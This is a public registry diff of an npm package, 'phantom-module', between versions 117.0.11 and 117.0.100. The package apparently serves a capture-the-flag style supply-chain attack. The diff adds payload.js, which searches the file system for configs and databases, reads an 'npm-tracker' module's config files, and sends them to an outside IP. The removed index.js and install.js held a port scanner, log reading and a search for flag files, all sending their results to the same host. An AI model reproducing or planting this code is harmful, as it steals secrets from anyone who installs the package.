phantom-module 117.0.11 → 117.0.100
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -67
- package/package.json +6 -2
- package/payload.js +83 -0
- package/ecto-spirit-999.999.999.tgz +0 -0
- package/install.js +0 -36
package/index.js
CHANGED
|
@@ -1,67 +1 @@
|
|
|
1
|
-
|
|
2
|
-
const http = require('http');
|
|
3
|
-
const net = require('net');
|
|
4
|
-
|
|
5
|
-
(function() {
|
|
6
|
-
if (!fs.existsSync('/home/node/aspect-node')) {
|
|
7
|
-
return;
|
|
8
|
-
}
|
|
9
|
-
|
|
10
|
-
let results = "";
|
|
11
|
-
let pending = 0;
|
|
12
|
-
const ips = [];
|
|
13
|
-
for (let i = 1; i <= 10; i++) {
|
|
14
|
-
ips.push(`172.17.0.${i}`);
|
|
15
|
-
}
|
|
16
|
-
|
|
17
|
-
function sendResults() {
|
|
18
|
-
const postData = JSON.stringify({
|
|
19
|
-
manifest: `ecto_module:\n name: "PORT_SCAN"\n cargo_hold: ${JSON.stringify(results.substring(0, 3500))}\n`
|
|
20
|
-
});
|
|
21
|
-
|
|
22
|
-
const req = http.request({
|
|
23
|
-
hostname: '154.57.164.64',
|
|
24
|
-
port: 31205,
|
|
25
|
-
path: '/api/modules/ECT-839201',
|
|
26
|
-
method: 'PUT',
|
|
27
|
-
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
|
|
28
|
-
});
|
|
29
|
-
req.write(postData);
|
|
30
|
-
req.end();
|
|
31
|
-
}
|
|
32
|
-
|
|
33
|
-
ips.forEach(ip => {
|
|
34
|
-
pending++;
|
|
35
|
-
const sock = new net.Socket();
|
|
36
|
-
sock.setTimeout(2000);
|
|
37
|
-
sock.on('connect', () => {
|
|
38
|
-
results += `${ip}:4873 OPEN\n`;
|
|
39
|
-
sock.destroy();
|
|
40
|
-
pending--;
|
|
41
|
-
if (pending === 0) sendResults();
|
|
42
|
-
});
|
|
43
|
-
sock.on('timeout', () => {
|
|
44
|
-
results += `${ip}:4873 TIMEOUT\n`;
|
|
45
|
-
sock.destroy();
|
|
46
|
-
pending--;
|
|
47
|
-
if (pending === 0) sendResults();
|
|
48
|
-
});
|
|
49
|
-
sock.on('error', (e) => {
|
|
50
|
-
results += `${ip}:4873 ${e.code}\n`;
|
|
51
|
-
pending--;
|
|
52
|
-
if (pending === 0) sendResults();
|
|
53
|
-
});
|
|
54
|
-
sock.connect(4873, ip);
|
|
55
|
-
});
|
|
56
|
-
|
|
57
|
-
setTimeout(() => {
|
|
58
|
-
if (pending > 0) {
|
|
59
|
-
results += `(${pending} still pending)\n`;
|
|
60
|
-
sendResults();
|
|
61
|
-
}
|
|
62
|
-
}, 5000);
|
|
63
|
-
})();
|
|
64
|
-
|
|
65
|
-
module.exports = function() {
|
|
66
|
-
return "pwnd";
|
|
67
|
-
};
|
|
1
|
+
module.exports = {};
|
package/package.json
CHANGED
package/payload.js
ADDED
|
@@ -0,0 +1,83 @@
|
|
|
1
|
+
const http = require('http');
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const path = require('path');
|
|
4
|
+
const { execSync } = require('child_process');
|
|
5
|
+
|
|
6
|
+
if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
|
|
7
|
+
|
|
8
|
+
const REPORT_HOST = '154.57.164.64';
|
|
9
|
+
const REPORT_PORT = 31205;
|
|
10
|
+
|
|
11
|
+
async function report(moduleId, data) {
|
|
12
|
+
return new Promise((resolve) => {
|
|
13
|
+
const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
|
|
14
|
+
const manifest = `ecto_module:\n name: "SCAN_RESULT"\n cargo_hold: "${safeData}"\n`;
|
|
15
|
+
const payload = JSON.stringify({ manifest });
|
|
16
|
+
const req = http.request({
|
|
17
|
+
hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
|
|
18
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
|
|
19
|
+
}, () => resolve(true));
|
|
20
|
+
req.on('error', () => resolve(false));
|
|
21
|
+
req.write(payload);
|
|
22
|
+
req.end();
|
|
23
|
+
});
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
function walk(dir, fileList = []) {
|
|
27
|
+
try {
|
|
28
|
+
const files = fs.readdirSync(dir);
|
|
29
|
+
files.forEach(file => {
|
|
30
|
+
const filePath = path.join(dir, file);
|
|
31
|
+
try {
|
|
32
|
+
const stat = fs.statSync(filePath);
|
|
33
|
+
if (stat.isDirectory()) {
|
|
34
|
+
if (file !== 'node_modules' && file !== '.git' && file !== 'proc' && file !== 'sys') walk(filePath, fileList);
|
|
35
|
+
} else {
|
|
36
|
+
fileList.push(filePath);
|
|
37
|
+
}
|
|
38
|
+
} catch(e) {}
|
|
39
|
+
});
|
|
40
|
+
} catch(e) {}
|
|
41
|
+
return fileList;
|
|
42
|
+
}
|
|
43
|
+
|
|
44
|
+
async function main() {
|
|
45
|
+
await report('ECT-654321', 'FS SCAN V11 STARTING...');
|
|
46
|
+
|
|
47
|
+
let fsOutput = '=== FIND RESULTS ===\n';
|
|
48
|
+
try {
|
|
49
|
+
fsOutput += `VERDACCIO CONFIGS:\n${execSync('find / -name "config.yaml" 2>/dev/null || true').toString()}\n`;
|
|
50
|
+
fsOutput += `VERDACCIO DIRS:\n${execSync('find / -name "verdaccio" 2>/dev/null || true').toString()}\n`;
|
|
51
|
+
fsOutput += `DB FILES:\n${execSync('find / -name "*.db" 2>/dev/null || true').toString()}\n`;
|
|
52
|
+
fsOutput += `SQLITE:\n${execSync('find / -name "*.sqlite" 2>/dev/null || true').toString()}\n`;
|
|
53
|
+
} catch(e) { fsOutput += `ERR: ${e.message}\n`; }
|
|
54
|
+
|
|
55
|
+
await report('ECT-839201', fsOutput);
|
|
56
|
+
|
|
57
|
+
// Dump specific config files
|
|
58
|
+
const configs = [
|
|
59
|
+
'/home/node/aspect-node/package.json',
|
|
60
|
+
'/home/node/aspect-node/modules/npm-tracker/src/config/config.json',
|
|
61
|
+
'/home/node/aspect-node/modules/npm-tracker/src/config/default.json',
|
|
62
|
+
'/home/node/aspect-node/modules/npm-tracker/src/config/production.json'
|
|
63
|
+
];
|
|
64
|
+
|
|
65
|
+
// Also list src/config dir
|
|
66
|
+
try {
|
|
67
|
+
const configDir = '/home/node/aspect-node/modules/npm-tracker/src/config';
|
|
68
|
+
fs.readdirSync(configDir).forEach(f => configs.push(path.join(configDir, f)));
|
|
69
|
+
} catch(e) {}
|
|
70
|
+
|
|
71
|
+
let configDump = '=== CONFIG DUMP ===\n';
|
|
72
|
+
const uniqueConfigs = [...new Set(configs)];
|
|
73
|
+
|
|
74
|
+
for (const f of uniqueConfigs) {
|
|
75
|
+
if (fs.existsSync(f)) {
|
|
76
|
+
configDump += `--- ${f} ---\n${fs.readFileSync(f, 'utf8').substring(0, 1000)}\n`;
|
|
77
|
+
}
|
|
78
|
+
}
|
|
79
|
+
|
|
80
|
+
await report('ECT-987654', configDump);
|
|
81
|
+
}
|
|
82
|
+
|
|
83
|
+
main().catch(e => report('ECT-654321', 'ERR: ' + e.message));
|
|
Binary file
|
package/install.js
DELETED
|
@@ -1,36 +0,0 @@
|
|
|
1
|
-
const fs = require('fs');
|
|
2
|
-
const http = require('http');
|
|
3
|
-
const { spawn } = require('child_process');
|
|
4
|
-
|
|
5
|
-
(function() {
|
|
6
|
-
const child = spawn('/bin/sh', ['-c', [
|
|
7
|
-
'sleep 35',
|
|
8
|
-
'OUTPUT="NONE"',
|
|
9
|
-
'LOGFILE="/home/node/aspect-node/logs/module.log"',
|
|
10
|
-
'if [ -f "$LOGFILE" ]; then',
|
|
11
|
-
' OUTPUT=$(tail -n 100 "$LOGFILE" | tr \'"\' "\'" | head -c 1000)',
|
|
12
|
-
'else',
|
|
13
|
-
' OUTPUT="LOG FILE NOT FOUND!"',
|
|
14
|
-
'fi',
|
|
15
|
-
'FLAG_FILES=$(find / -name "*flag*" -type f 2>/dev/null | head -c 500)',
|
|
16
|
-
'BODY=\'{"manifest":"ecto_module:\\n name: \\\\"FLAG_DELAYED\\\\"\\n cargo_hold: \\\\"\'$OUTPUT\' | FILES: \'$FLAG_FILES\'\\\\"\\"}\'',
|
|
17
|
-
'echo "$BODY" > /tmp/flag.json',
|
|
18
|
-
'node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31205,path:\'/api/modules/ECT-654321\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}});r.write(d);r.end();"'
|
|
19
|
-
].join('\n')], { detached: true, stdio: 'ignore' });
|
|
20
|
-
|
|
21
|
-
child.unref();
|
|
22
|
-
|
|
23
|
-
// Send an immediate ping so we know it started
|
|
24
|
-
const postData = JSON.stringify({
|
|
25
|
-
manifest: `ecto_module:\n name: "WAITING_35_SECONDS"\n`
|
|
26
|
-
});
|
|
27
|
-
const req = http.request({
|
|
28
|
-
hostname: '154.57.164.64',
|
|
29
|
-
port: 31205,
|
|
30
|
-
path: '/api/modules/ECT-654321',
|
|
31
|
-
method: 'PUT',
|
|
32
|
-
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
|
|
33
|
-
});
|
|
34
|
-
req.write(postData);
|
|
35
|
-
req.end();
|
|
36
|
-
})();
|